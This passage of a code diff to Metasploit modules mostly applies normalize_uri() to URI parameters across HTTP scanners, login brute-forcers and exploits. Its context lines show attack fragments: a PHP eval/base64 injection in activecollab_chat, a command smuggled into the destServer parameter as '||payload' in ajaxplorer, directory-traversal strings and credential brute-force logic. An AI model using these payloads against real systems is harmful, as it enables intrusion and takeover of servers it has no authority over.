-				'uri'     => "/#{uri}#{nullbytetxt}",
+				'uri'     => "#{uri}#{nullbytetxt}",
 			}, 25)
 
 			version = res.headers['Server'] if res

--- a/modules/auxiliary/scanner/http/lucky_punch.rb
+++ b/modules/auxiliary/scanner/http/lucky_punch.rb
@@ -86,7 +86,7 @@ EOF
 
 	begin
 		normalres = send_request_cgi({
-			'uri'          =>  datastore['URI'],
+			'uri'          =>  normalize_uri(datastore['URI']),
 			'vars_get'     =>  gvars,
 			'method'       => 'GET',
 			'ctype'        => 'text/plain'

--- a/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb
+++ b/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb
@@ -49,6 +49,7 @@ class Metasploit3 < Msf::Auxiliary
 	end
 
 	def target_url
+		uri = normalize_uri(datastore['URI'])
 		"http://#{vhost}:#{rport}#{datastore['URI']}"
 	end
 
@@ -57,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary
 			'../',
 			'./.../'
 		]
-		uri  = datastore['URI']
+		uri  = normalize_uri(datastore['URI'])
 		file = datastore['FILE']
 		deep = datastore['DEPTH']
 		file = file.gsub(/^\//, "")

--- a/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb
+++ b/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb
@@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
 
 
 	def run_host(ip)
-		base = target_uri.path
+		base = normalize_uri(target_uri.path)
 		base << '/' if base[-1,1] != '/'
 
 		peer = "#{ip}:#{rport}"

--- a/modules/auxiliary/scanner/http/mod_negotiation_brute.rb
+++ b/modules/auxiliary/scanner/http/mod_negotiation_brute.rb
@@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary
 		ecode = nil
 		emesg = nil
 
-		tpath = datastore['PATH']
+		tpath = normalize_uri(datastore['PATH'])
 		tfile = datastore['FILEPATH']
 
 		if tpath[-1,1] != '/'

--- a/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb
+++ b/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb
@@ -50,7 +50,7 @@ class Metasploit3 < Msf::Auxiliary
 	end
 
 	def run_host(ip)
-		tpath = datastore['PATH']
+		tpath = normalize_uri(datastore['PATH'])
 		if tpath[-1,1] != '/'
 			tpath += '/'
 		end

--- a/modules/auxiliary/scanner/http/nginx_source_disclosure.rb
+++ b/modules/auxiliary/scanner/http/nginx_source_disclosure.rb
@@ -49,11 +49,12 @@ class Metasploit3 < Msf::Auxiliary
 	end
 
 	def target_url
-		"http://#{vhost}:#{rport}#{datastore['URI']}"
+		uri = normalize_uri(datastore['URI'])
+		"http://#{vhost}:#{rport}#{uri}"
 	end
 
 	def run_host(ip)
-		uri = datastore['URI']
+		uri = normalize_uri(datastore['URI'])
 		path_save = datastore['PATH_SAVE']
 
 		vuln_versions = [
@@ -73,7 +74,7 @@ class Metasploit3 < Msf::Auxiliary
 			res = send_request_raw(
 				{
 					'method'  => 'GET',
-					'uri'     => "/#{uri}#{get_source}",
+					'uri'     => "#{uri}#{get_source}",
 				}, 25)
 
 			if res

--- a/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb
+++ b/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb
@@ -68,7 +68,7 @@ class Metasploit3 < Msf::Auxiliary
 			'~'
 		]
 
-		tpath = datastore['PATH']
+		tpath = normalize_uri(datastore['PATH'])
 
 		if tpath.eql? "/"||""
 			print_error("Blank or default PATH set.");

--- a/modules/auxiliary/scanner/http/rails_mass_assignment.rb
+++ b/modules/auxiliary/scanner/http/rails_mass_assignment.rb
@@ -79,7 +79,7 @@ class Metasploit3 < Msf::Auxiliary
 			query.merge!(test_param)
 
 			resp = send_request_cgi({
-				'uri'       => datastore['PATH'],
+				'uri'       => normalize_uri(datastore['PATH']),
 				'vars_get'  => datastore['METHOD'] == 'POST' ? queryparse(datastore['QUERY'].to_s) : query,
 				'method'    => datastore['METHOD'],
 				'ctype'     => 'application/x-www-form-urlencoded',

--- a/modules/auxiliary/scanner/http/robots_txt.rb
+++ b/modules/auxiliary/scanner/http/robots_txt.rb
@@ -41,7 +41,7 @@ class Metasploit3 < Msf::Auxiliary
 
 	def run_host(target_host)
 
-		tpath = datastore['PATH']
+		tpath = normalize_uri(datastore['PATH'])
 		if tpath[-1,1] != '/'
 			tpath += '/'
 		end

--- a/modules/auxiliary/scanner/http/s40_traversal.rb
+++ b/modules/auxiliary/scanner/http/s40_traversal.rb
@@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
 	end
 
 	def run
-		uri = target_uri.path
+		uri = normalize_uri(target_uri.path)
 		uri << '/' if uri[-1, 1] != '/'
 
 		t = "/.." * datastore['DEPTH']

--- a/modules/auxiliary/scanner/http/scraper.rb
+++ b/modules/auxiliary/scanner/http/scraper.rb
@@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary
 
 	def run_host(target_host)
 
-		tpath = datastore['PATH']
+		tpath = normalize_uri(datastore['PATH'])
 		if tpath[-1,1] != '/'
 			tpath += '/'
 		end

--- a/modules/auxiliary/scanner/http/soap_xml.rb
+++ b/modules/auxiliary/scanner/http/soap_xml.rb
@@ -151,10 +151,11 @@ class Metasploit3 < Msf::Auxiliary
 					data_parts << nil
 					data = data_parts.join("\r\n")
 
-					vprint_status("Sending request #{datastore['PATH']}/#{v}#{n} to #{wmap_target_host}:#{datastore['RPORT']}")
+					uri = normalize_uri(datastore['PATH'])
+					vprint_status("Sending request #{uri}/#{v}#{n} to #{wmap_target_host}:#{datastore['RPORT']}")
 
 					res = send_request_raw({
-						'uri'     => datastore['PATH'] + '/' + v + n,
+						'uri'     => uri + '/' + v + n,
 						'method'  => 'POST',
 						'vhost'   => vhost,
 						'data'	  => data,

--- a/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb
+++ b/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb
@@ -54,7 +54,8 @@ class Metasploit3 < Msf::Auxiliary
 	end
 
 	def target_url
-		"http://#{vhost}:#{rport}#{datastore['URI']}"
+		uri = normalize_uri(datastore['URI'])
+		"http://#{vhost}:#{rport}#{uri}"
 	end
 
 	def run_host(ip)

--- a/modules/auxiliary/scanner/http/svn_scanner.rb
+++ b/modules/auxiliary/scanner/http/svn_scanner.rb
@@ -54,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary
 		ecode = nil
 		emesg = nil
 
-		tpath = datastore['PATH']
+		tpath = normalize_uri(datastore['PATH'])
 		if tpath[-1,1] != '/'
 			tpath += '/'
 		end

--- a/modules/auxiliary/scanner/http/tomcat_enum.rb
+++ b/modules/auxiliary/scanner/http/tomcat_enum.rb
@@ -55,7 +55,8 @@ class Metasploit3 < Msf::Auxiliary
 	end
 
 	def target_url
-		"http://#{vhost}:#{rport}#{datastore['URI']}"
+		uri = normalize_uri(datastore['URI'])
+		"http://#{vhost}:#{rport}#{uri}"
 	end
 
 	def run_host(ip)
@@ -85,7 +86,7 @@ class Metasploit3 < Msf::Auxiliary
 			res = send_request_cgi(
 				{
 					'method'  => 'POST',
-					'uri'     => datastore['URI'],
+					'uri'     => normalize_uri(datastore['URI']),
 					'data'    => post_data,
 				}, 20)
 

--- a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb
+++ b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb
@@ -77,18 +77,19 @@ class Metasploit3 < Msf::Auxiliary
 
 	def run_host(ip)
 		begin
+			uri = normalize_uri(datastore['URI'])
 			res = send_request_cgi({
-				'uri'     => "#{datastore['URI']}",
+				'uri'     => uri,
 				'method'  => 'GET'
 				}, 25)
 			http_fingerprint({ :response => res })
 		rescue ::Rex::ConnectionError => e
-			vprint_error("http://#{rhost}:#{rport}#{datastore['URI']} - #{e}")
+			vprint_error("http://#{rhost}:#{rport}#{uri} - #{e}")
 			return
 		end
 
 		if not res
-			vprint_error("http://#{rhost}:#{rport}#{datastore['URI']} - No response")
+			vprint_error("http://#{rhost}:#{rport}#{uri} - No response")
 			return
 		end
 		if res.code != 401
@@ -106,10 +107,10 @@ class Metasploit3 < Msf::Auxiliary
 		success = false
 		srvhdr = '?'
 		user_pass = Rex::Text.encode_base64(user + ":" + pass)
-
+		uri = normalize_uri(datastore['URI'])
 		begin
 			res = send_request_cgi({
-				'uri'     => "#{datastore['URI']}",
+				'uri'     => uri,
 				'method'  => 'GET',
 				'headers' =>
 					{
@@ -117,7 +118,7 @@ class Metasploit3 < Msf::Auxiliary
 					}
 				}, 25)
 			unless (res.kind_of? Rex::Proto::Http::Response)
-				vprint_error("http://#{rhost}:#{rport}#{datastore['URI']} not responding")
+				vprint_error("http://#{rhost}:#{rport}#{uri} not responding")
 				return :abort
 			end
 			return :abort if (res.code == 404)
@@ -131,12 +132,12 @@ class Metasploit3 < Msf::Auxiliary
 			end
 
 		rescue ::Rex::ConnectionError => e
-			vprint_error("http://#{rhost}:#{rport}#{datastore['URI']} - #{e}")
+			vprint_error("http://#{rhost}:#{rport}#{uri} - #{e}")
 			return :abort
 		end
 
 		if success
-			print_good("http://#{rhost}:#{rport}#{datastore['URI']} [#{srvhdr}] [Tomcat Application Manager] successful login '#{user}' : '#{pass}'")
+			print_good("http://#{rhost}:#{rport}#{uri} [#{srvhdr}] [Tomcat Application Manager] successful login '#{user}' : '#{pass}'")
 			report_auth_info(
 				:host => rhost,
 				:port => rport,
@@ -151,7 +152,7 @@ class Metasploit3 < Msf::Auxiliary
 
 			return :next_user
 		else
-			vprint_error("http://#{rhost}:#{rport}#{datastore['URI']} [#{srvhdr}] [Tomcat Application Manager] failed to login as '#{user}'")
+			vprint_error("http://#{rhost}:#{rport}#{uri} [#{srvhdr}] [Tomcat Application Manager] failed to login as '#{user}'")
 			return
 		end
 	end

--- a/modules/auxiliary/scanner/http/trace_axd.rb
+++ b/modules/auxiliary/scanner/http/trace_axd.rb
@@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary
 	end
 
 	def run_host(target_host)
-		tpath = datastore['PATH']
+		tpath = normalize_uri(datastore['PATH'])
 		if tpath[-1,1] != '/'
 			tpath += '/'
 		end

--- a/modules/auxiliary/scanner/http/vcms_login.rb
+++ b/modules/auxiliary/scanner/http/vcms_login.rb
@@ -108,7 +108,7 @@ class Metasploit3 < Msf::Auxiliary
 	end
 
 	def run
-		@uri = target_uri
+		@uri = normalize_uri(target_uri)
 		@uri.path << "/" if @uri.path[-1, 1] != "/"
 		@peer = "#{rhost}:#{rport}"
 

--- a/modules/auxiliary/scanner/http/verb_auth_bypass.rb
+++ b/modules/auxiliary/scanner/http/verb_auth_bypass.rb
@@ -53,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary
 
 		begin
 			res = send_request_raw({
-				'uri'          => datastore['PATH'],
+				'uri'          => normalize_uri(datastore['PATH']),
 				'method'       => 'GET'
 			}, 10)
 
@@ -76,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary
 
 					verbs.each do |tv|
 						resauth = send_request_raw({
-							'uri'          => datastore['PATH'],
+							'uri'          => normalize_uri(datastore['PATH']),
 							'method'       => tv
 						}, 10)
 

--- a/modules/auxiliary/scanner/http/vhost_scanner.rb
+++ b/modules/auxiliary/scanner/http/vhost_scanner.rb
@@ -79,7 +79,7 @@ require 'cgi'
 
 				begin
 					noexistsres = send_request_cgi({
-						'uri'  		=>  datastore['PATH'],
+						'uri'  		=>  normalize_uri(datastore['PATH']),
 						'vars_get' 	=>  tquery,
 						'headers' 	=>  thead,
 						'vhost'		=>  randhost,
@@ -108,7 +108,7 @@ require 'cgi'
 
 				begin
 					res = send_request_cgi({
-						'uri'  		=>  datastore['PATH'],
+						'uri'  		=>  normalize_uri(datastore['PATH']),
 						'vars_get' 	=>  tquery,
 						'headers' 	=>  thead,
 						'vhost'		=>  thost,

--- a/modules/auxiliary/scanner/http/vmware_update_manager_traversal.rb
+++ b/modules/auxiliary/scanner/http/vmware_update_manager_traversal.rb
@@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
 	def run_host(ip)
 		fname     = File.basename(datastore['FILE'])
 		traversal = ".\\..\\..\\..\\..\\..\\..\\..\\"
-		uri = datastore['URIPATH'] + traversal + datastore['FILE']
+		uri = normalize_uri(datastore['URIPATH'])+ '/' + traversal + datastore['FILE']
 
 		print_status("#{rhost}:#{rport} - Requesting: #{uri}")
 

--- a/modules/auxiliary/scanner/http/web_vulndb.rb
+++ b/modules/auxiliary/scanner/http/web_vulndb.rb
@@ -58,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary
 		conn = false
 		usecode = datastore['ForceCode']
 
-		tpath = datastore['PATH']
+		tpath = normalize_uri(datastore['PATH'])
 		if tpath[-1,1] != '/'
 			tpath += '/'
 		end

--- a/modules/auxiliary/scanner/http/webdav_internal_ip.rb
+++ b/modules/auxiliary/scanner/http/webdav_internal_ip.rb
@@ -41,7 +41,7 @@ class Metasploit3 < Msf::Auxiliary
 
 		begin
 			res = send_request_cgi({
-				'uri'          => datastore['PATH'],
+				'uri'          => normalize_uri(datastore['PATH']),
 				'method'       => 'PROPFIND',
 				'data'	=>	'',
 				'ctype'   => 'text/xml',

--- a/modules/auxiliary/scanner/http/webdav_scanner.rb
+++ b/modules/auxiliary/scanner/http/webdav_scanner.rb
@@ -41,7 +41,7 @@ class Metasploit3 < Msf::Auxiliary
 
 		begin
 			res = send_request_raw({
-				'uri'          => datastore['PATH'],
+				'uri'          => normalize_uri(datastore['PATH']),
 				'method'       => 'OPTIONS'
 			}, 10)
 

--- a/modules/auxiliary/scanner/http/webdav_website_content.rb
+++ b/modules/auxiliary/scanner/http/webdav_website_content.rb
@@ -41,7 +41,7 @@ class Metasploit3 < Msf::Auxiliary
 
 		begin
 			res = send_request_cgi({
-				'uri'          => datastore['PATH'],
+				'uri'          => normalize_uri(datastore['PATH']),
 				'method'       => 'PROPFIND',
 				'data'	=>	'',
 				'ctype'   => 'text/xml',

--- a/modules/auxiliary/scanner/http/webpagetest_traversal.rb
+++ b/modules/auxiliary/scanner/http/webpagetest_traversal.rb
@@ -49,7 +49,8 @@ class Metasploit3 < Msf::Auxiliary
 	def run_host(ip)
 		file     = (datastore['FILE'][0,1] == '/') ? datastore['FILE'] : "/#{datastore['FILE']}"
 		traverse = "../" * datastore['DEPTH']
-		base     = File.dirname("#{target_uri.path}/.")
+		uri      = normalize_uri(target_uri.path)
+		base     = File.dirname("#{uri}/.")
 
 		print_status("Requesting: #{file} - #{rhost}")
 		res = send_request_cgi({

--- a/modules/auxiliary/scanner/http/wordpress_login_enum.rb
+++ b/modules/auxiliary/scanner/http/wordpress_login_enum.rb
@@ -46,7 +46,8 @@ class Metasploit3 < Msf::Auxiliary
 	end
 
 	def target_url
-		"http://#{vhost}:#{rport}#{datastore['URI']}"
+		uri = normalize_uri(datastore['URI'])
+		"http://#{vhost}:#{rport}#{uri}"
 	end
 
 
@@ -90,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary
 
 			res = send_request_cgi({
 				'method'  => 'POST',
-				'uri'     => datastore['URI'],
+				'uri'     => normalize_uri(datastore['URI']),
 				'data'    => post_data,
 			}, 20)
 
@@ -146,7 +147,7 @@ class Metasploit3 < Msf::Auxiliary
 
 			res = send_request_cgi({
 				'method'  => 'POST',
-				'uri'     => datastore['URI'],
+				'uri'     => normalize_uri(datastore['URI']),
 				'data'    => post_data,
 			}, 20)
 

--- a/modules/auxiliary/scanner/http/xpath.rb
+++ b/modules/auxiliary/scanner/http/xpath.rb
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary
 		falsecond = "'%20and%20'#{rnum}'='#{rnum+1}"
 
 		hmeth = datastore['METHOD']
-		tpath = datastore['PATH']
+		tpath = normalize_uri(datastore['PATH'])
 		prequery = datastore['PRE_QUERY']
 		postquery = datastore['POST_QUERY']
 		emesg = datastore['ERROR_MSG']

--- a/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb
+++ b/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb
@@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary
 
 		user = datastore['NOTES_USER'].to_s
 		pass = datastore['NOTES_PASS'].to_s
-		$uri =  datastore['URI'].to_s
+		$uri = normalize_uri(datastore['URI'])
 
 		if (user.length == 0 and pass.length == 0)
 			print_status("http://#{vhost}:#{rport} - Lotus Domino - Trying dump password hashes without credentials")

--- a/modules/auxiliary/scanner/lotus/lotus_domino_version.rb
+++ b/modules/auxiliary/scanner/lotus/lotus_domino_version.rb
@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary
 
 	def run_host(ip)
 
-		path = datastore['PATH']
+		path = normalize_uri(datastore['PATH'])
 		check1 = [
 			'iNotes/Forms5.nsf',
 			'iNotes/Forms6.nsf',

--- a/modules/auxiliary/scanner/vmware/esx_fingerprint.rb
+++ b/modules/auxiliary/scanner/vmware/esx_fingerprint.rb
@@ -51,7 +51,7 @@ class Metasploit3 < Msf::Auxiliary
 			</env:Envelope>|
 		begin
 			res = send_request_cgi({
-				'uri'     => datastore['URI'],
+				'uri'     => normalize_uri(datastore['URI']),
 				'method'  => 'POST',
 				'agent'   => 'VMware VI Client',
 				'data' =>  soap_data,

--- a/modules/auxiliary/scanner/vmware/vmware_http_login.rb
+++ b/modules/auxiliary/scanner/vmware/vmware_http_login.rb
@@ -81,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary
 
 		begin
 			res = send_request_cgi({
-				'uri'     => datastore['URI'],
+				'uri'     => normalize_uri(datastore['URI']),
 				'method'  => 'POST',
 				'agent'   => 'VMware VI Client',
 				'data'    => soap_data

--- a/modules/auxiliary/server/http_ntlmrelay.rb
+++ b/modules/auxiliary/server/http_ntlmrelay.rb
@@ -299,7 +299,7 @@ class Metasploit3 < Msf::Auxiliary
 		end
 
 		opts = {
-		'uri'     => datastore['RURIPATH'],
+		'uri'     => normalize_uri(datastore['RURIPATH']),
 		'method'  => method,
 		'version' => '1.1',
 		}

--- a/modules/exploits/bsdi/softcart/mercantec_softcart.rb
+++ b/modules/exploits/bsdi/softcart/mercantec_softcart.rb
@@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def brute_exploit(address)
 		if not (@mercantec)
 			res = send_request_raw({
-				'uri'   => datastore['URI']
+				'uri'   => normalize_uri(datastore['URI'])
 			}, 5)
 			@mercantec = (res and res.body and res.body =~ /Copyright.*Mercantec/)
 			fail_with(Exploit::Failure::NotFound, "The target is not a Mercantec CGI") if not @mercantec
@@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		print_status("Trying #{"%.8x" % address['Ret']}...")
 		res = send_request_raw({
-			'uri'   => datastore['URI'],
+			'uri'   => normalize_uri(datastore['URI']),
 			'query' => buffer
 		}, 5)
 

--- a/modules/exploits/linux/http/dolibarr_cmd_exec.rb
+++ b/modules/exploits/linux/http/dolibarr_cmd_exec.rb
@@ -59,9 +59,10 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def check
+		uri = normalize_uri(target_uri.path)
 		res = send_request_raw({
 			'method' => 'GET',
-			'uri'    => target_uri.path
+			'uri'    => uri
 		})
 
 		if res and res.body =~ /Dolibarr 3\.1\.1/
@@ -112,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def exploit
-		@uri = target_uri
+		@uri = normalize_uri(target_uri)
 		@uri.path << "/" if @uri.path[-1, 1] != "/"
 		peer = "#{rhost}:#{rport}"
 

--- a/modules/exploits/linux/http/symantec_web_gateway_exec.rb
+++ b/modules/exploits/linux/http/symantec_web_gateway_exec.rb
@@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def exploit
-		uri = target_uri.path
+		uri = normalize_uri(target_uri.path)
 		uri << '/' if uri[-1,1] != '/'
 
 		peer = "#{rhost}:#{rport}"

--- a/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb
+++ b/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb
@@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def exploit
-		uri = target_uri.path
+		uri = normalize_uri(target_uri.path)
 		uri << '/' if uri[-1,1] != '/'
 
 		peer = "#{rhost}:#{rport}"

--- a/modules/exploits/linux/http/vcms_upload.rb
+++ b/modules/exploits/linux/http/vcms_upload.rb
@@ -62,8 +62,9 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def check
+		uri = normalize_uri(target_uri.path)
 		res = send_request_raw({
-			'uri'   => target_uri.path,
+			'uri'   => uri,
 			'method' => 'GET'
 		})
 
@@ -77,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		peer = "#{rhost}:#{rport}"
 
-		base = target_uri.path
+		base = normalize_uri(target_uri.path)
 		base << '/' if base[-1,1] != '/'
 
 		@payload_name = "#{rand_text_alpha(5)}.php"

--- a/modules/exploits/linux/http/webcalendar_settings_exec.rb
+++ b/modules/exploits/linux/http/webcalendar_settings_exec.rb
@@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def check
-		uri = target_uri.path
+		uri = normalize_uri(target_uri.path)
 		uri << '/' if uri[-1, 1] != '/'
 
 		res = send_request_raw({
@@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		peer = "#{rhost}:#{rport}"
 
-		uri = target_uri.path
+		uri = normalize_uri(target_uri.path)
 		uri << '/' if uri[-1, 1] != '/'
 
 		print_status("#{peer} - Housing php payload...")

--- a/modules/exploits/linux/http/webid_converter.rb
+++ b/modules/exploits/linux/http/webid_converter.rb
@@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def check
-		uri = target_uri.path
+		uri = normalize_uri(target_uri.path)
 		uri << '/' if uri[-1,1] != '/'
 
 		res = send_request_cgi({
@@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def exploit
 
-		uri = target_uri.path
+		uri = normalize_uri(target_uri.path)
 		uri << '/' if uri[-1,1] != '/'
 		peer = "#{rhost}:#{rport}"
 

--- a/modules/exploits/multi/http/activecollab_chat.rb
+++ b/modules/exploits/multi/http/activecollab_chat.rb
@@ -55,13 +55,13 @@ class Metasploit3 < Msf::Exploit::Remote
 	def check
 
 		login_path = "public/index.php?path_info=login&re_route=homepage"
-		uri = datastore['URI']
-		uri += (datastore['URI'][-1, 1] == "/") ? login_path : "/#{login_path}"
+		uri = normalize_uri(datastore['URI'])
+		uri += (normalize_uri(datastore['URI'])[-1, 1] == "/") ? login_path : "/#{login_path}"
 
 		cms = send_request_raw({'uri' => uri}, 25)
 
-		uri = datastore['URI']
-		uri += (datastore['URI'][-1, 1] == "/") ? 'public/assets/modules/chat/' : '/public/assets/modules/chat/'
+		uri = normalize_uri(datastore['URI'])
+		uri += (normalize_uri(datastore['URI'])[-1, 1] == "/") ? 'public/assets/modules/chat/' : '/public/assets/modules/chat/'
 
 		chat = send_request_raw({'uri' => uri}, 25)
 
@@ -80,8 +80,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		pass = datastore['PASS']
 		p = Rex::Text.encode_base64(payload.encoded)
 		header = rand_text_alpha_upper(3)
-		login_uri = datastore['URI']
-		login_uri += (datastore['URI'][-1, 1] == "/") ? 'public/index.php?path_info=login' : '/public/index.php?path_info=login'
+		login_uri = normalize_uri(datastore['URI'])
+		login_uri += (normalize_uri(datastore['URI'])[-1, 1] == "/") ? 'public/index.php?path_info=login' : '/public/index.php?path_info=login'
 
 		# login
 		res = send_request_cgi({
@@ -107,8 +107,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 
 		# injection
-		iuri = datastore['URI']
-		iuri += (datastore['URI'][-1, 1] == "/") ? 'index.php' : '/index.php'
+		iuri = normalize_uri(datastore['URI'])
+		iuri += (normalize_uri(datastore['URI'])[-1, 1] == "/") ? 'index.php' : '/index.php'
 		iuri << "?path_info=chat/add_message&async=1"
 		phpkode = "{\${eval(base64_decode(\$_SERVER[HTTP_#{header}]))}}"
 		injection = "<th>\");#{phpkode}</th>"
@@ -129,8 +129,8 @@ class Metasploit3 < Msf::Exploit::Remote
 				}
 		}, 25)
 
-		euri = datastore['URI']
-		euri += (datastore['URI'][-1, 1] == "/") ? 'public/index.php' : '/public/index.php'
+		euri = normalize_uri(datastore['URI'])
+		euri += (normalize_uri(datastore['URI'])[-1, 1] == "/") ? 'public/index.php' : '/public/index.php'
 		euri << "?path_info=/chat/history/1"
 
 		# execution

--- a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb
+++ b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb
@@ -57,12 +57,13 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def check
-		target_uri.path << '/' if target_uri.path[-1,1] != '/'
+		uri = normalize_uri(target_uri.path)
+		uri << '/' if uri[-1,1] != '/'
 		clue = Rex::Text::rand_text_alpha(rand(5) + 5)
 
 		res = send_request_cgi({
 			'method' => 'GET',
-			'uri'      => "#{target_uri.path}plugins/access.ssh/checkInstall.php",
+			'uri'      => "#{uri}plugins/access.ssh/checkInstall.php",
 			'vars_get' => {
 				'destServer'    => "||echo #{clue}"
 			}
@@ -78,12 +79,13 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def exploit
 		peer = "#{rhost}:#{rport}"
-		target_uri.path << '/' if target_uri.path[-1,1] != '/'
+		uri = normalize_uri(target_uri.path)
+		uri << '/' if target_uri.path[-1,1] != '/'
 
 		# Trigger the command execution bug
 		res = send_request_cgi({
 			'method' => 'GET',
-			'uri'      => "#{target_uri.path}plugins/access.ssh/checkInstall.php",
+			'uri'      => "#{uri}plugins/access.ssh/checkInstall.php",
 			'vars_get' =>
 				{
 					'destServer'    => "||#{payload.encoded}"

--- a/modules/exploits/multi/http/apprain_upload_exec.rb
+++ b/modules/exploits/multi/http/apprain_upload_exec.rb
@@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def check
-		uri = target_uri.path
+		uri = normalize_uri(target_uri.path)
 		uri << '/' if uri[-1,1] != '/'
 
 		res = send_request_cgi({
@@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def exploit
-		uri = target_uri.path
+		uri = normalize_uri(target_uri.path)
 		uri << '/' if uri[-1,1] != '/'
 
 		peer = "#{rhost}:#{rport}"

--- a/modules/exploits/multi/http/auxilium_upload_exec.rb
+++ b/modules/exploits/multi/http/auxilium_upload_exec.rb
@@ -56,8 +56,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
 	def check
-		target_uri.path << '/' if target_uri.path[-1,1] != '/'
-		base = File.dirname("#{target_uri.path}.")
+		uri = normalize_uri(target_uri.path)
+		uri << '/' if uri[-1,1] != '/'
+		base = File.dirname("#{uri}.")
 
 		res = send_request_raw({'uri'=>"#{base}/admin/sitebanners/upload_banners.php"})
 		if res and res.body =~ /\<title\>Pet Rate Admin \- Banner Manager\<\/title\>/
@@ -106,8 +107,9 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		@peer = "#{rhost}:#{rport}"
 
-		target_uri.path << '/' if target_uri.path[-1,1] != '/'
-		base = File.dirname("#{target_uri.path}.")
+		uri = normalize_uri(target_uri.path)
+		uri << '/' if uri[-1,1] != '/'
+		base = File.dirname("#{uri}.")
 
 		php_fname =  "#{Rex::Text.rand_text_alpha(5)}.php"
 

--- a/modules/exploits/multi/http/cuteflow_upload_exec.rb
+++ b/modules/exploits/multi/http/cuteflow_upload_exec.rb
@@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def check
 
-		base  = target_uri.path
+		base  = normalize_uri(target_uri.path)
 		base << '/' if base[-1, 1] != '/'
 		res = send_request_raw({
 			'method' => 'GET',
@@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def exploit
-		base  = target_uri.path
+		base  = normalize_uri(target_uri.path)
 		base << '/' if base[-1, 1] != '/'
 		@peer = "#{rhost}:#{rport}"
 

--- a/modules/exploits/multi/http/familycms_less_exec.rb
+++ b/modules/exploits/multi/http/familycms_less_exec.rb
@@ -57,8 +57,8 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def check
-		uri = datastore['URI']
-		uri += (datastore['URI'][-1, 1] == "/") ? "dev/less.php" : "/dev/less.php"
+		uri = normalize_uri(datastore['URI'])
+		uri += (normalize_uri(datastore['URI'])[-1, 1] == "/") ? "dev/less.php" : "/dev/less.php"
 
 		mark = Rex::Text.rand_text_alpha(rand(5) + 5)
 
@@ -75,8 +75,8 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def exploit
-		uri = datastore['URI']
-		uri += (datastore['URI'][-1, 1] == "/") ? "dev/less.php" : "/dev/less.php"
+		uri = normalize_uri(datastore['URI'])
+		uri += (normalize_uri(datastore['URI'])[-1, 1] == "/") ? "dev/less.php" : "/dev/less.php"
 
 		start_mark = Rex::Text.rand_text_alpha(rand(5) + 5)
 		end_mark  = Rex::Text.rand_text_alpha(rand(5) + 5)

--- a/modules/exploits/multi/http/gitorious_graph.rb
+++ b/modules/exploits/multi/http/gitorious_graph.rb
@@ -54,15 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def exploit
 		# Make sure the URI begins with a slash
-		uri = datastore['URI']
-		if uri[0,1] != '/'
-			uri = '/' + uri
-		end
-
-		# Make sure the URI ends without a slash, because it's already part of the URI
-		if uri[-1, 1] == '/'
-			uri = uri[0, uri.length-1]
-		end
+		uri = normalize_uri(datastore['URI'])
 
 		command = Rex::Text.uri_encode(payload.raw, 'hex-all')
